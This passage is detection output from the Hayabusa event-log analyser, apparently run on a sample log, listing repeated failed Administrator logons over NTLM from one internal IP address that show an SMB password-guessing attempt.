+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWvZjuZhnGcrelOM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vb6ePjmpA8ZwK1PW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:52.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e1A9ZY20WM8oDn6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 71GKLnXqSEEuc1Fw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w0GsW0vDEkpRa1X0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0HH6zUUoL0qlfFC2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AG4pYsjob1iwlOc0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dNCX5tZ0nF1foTLW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vO82Kb0kboVFuJy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DptE2C8ZK3AxCb43 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.871 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NC8manvVP5pU8F3N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.926 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m00bI5welsLUWmwJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4shyxJk2PiH1TDlj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:53.014 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xZyN2WO3UVY0WQs6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.053 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oSQjAMckifap5r1k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qixqXiX0mVcuXe37 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.126 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIfJCJz6l36WMeY9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SZxv5U7uoN6E8c8E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mlIfE0N32OQeWuNw : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkZcjpTmHcJ0uX38 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GZfaHr2Yq6xkRjOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jvy0EIiPSnom7pn3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TN9PUb0BgI3u8Xax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xCgz5BNpQgLgW0Xi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:53.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: po2GBdrXr3XtBsWR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O2rgo6jHcqu10IGY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MLblUOGzYzVA47E9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ysuA1xpYuAGRNONJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ksedziaGzXk5VNlS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.711 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: irIfGLQdhtRRGwuo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YCf6WUjiS11hHqKT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1o0CTT7GsWfCWuHx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F6Jr8XrUsmTiSdol : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Buj66iuSkLEQdKnQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L1wOLI51HqfkgO6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:53.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X4oe273WXOICzkwW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1c7nGezYNJ70jR6R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ajuZ09zGeuovCQLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4k7xV7soNF4mHlz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CtdqW8zOw1GoQcvA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aY6FLi1edRZWrRZN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ah1JoKfxJzQhCCVL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIMOZRGcv4o33BWd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nmLyLJoVZz6fJ62I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aGufqEGD4hFf2XLM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7IEdKy2H5Agblpjt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:54.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XT9k8C05GVLBNPdl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5opHh8HelCXtR5Cm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K0dntDwYLmag9efo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.514 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UQfZOMFV9LtY7r2S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y01v38dTUIsJEZIv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pCP8x2QBZ6IvMEnf : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.739 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hgcbYjw3kKqlK7Di : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TFU97Tq3e7IWvSKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1hUCvaS1yM2FU9AE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8JInVlBqTSfT4J1s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EjXRQUGDKBZaMkw3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:54.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fZPXNxkGOrld5eCR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OBDhSrF7DZ1KBRa8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dQ7TKJOGibAVNoCH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.054 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZE1GARxx03m4FtEL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gf3VLLTxsK85bsrv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.123 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 58G6MFVbW55JZIV5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yxne9LqZCqBf3qkc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ssZya6gArnuepKyW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rsDEj6o0NaKUYPZL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pELSIsupIYAxPCtv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: urHCDmdCfNexxUHf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:55.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: czGXZFukLquA9Mce : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: icWMY9pKCQMyTxJg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v28FLC2WXEXSUiI5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.510 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FwhjHww5iA51SFjp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 96BwmhKqDIojhdRA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DiRvofjwoeAdHYrv : IP Address: 192.168.198.149 : AuthPackage: 
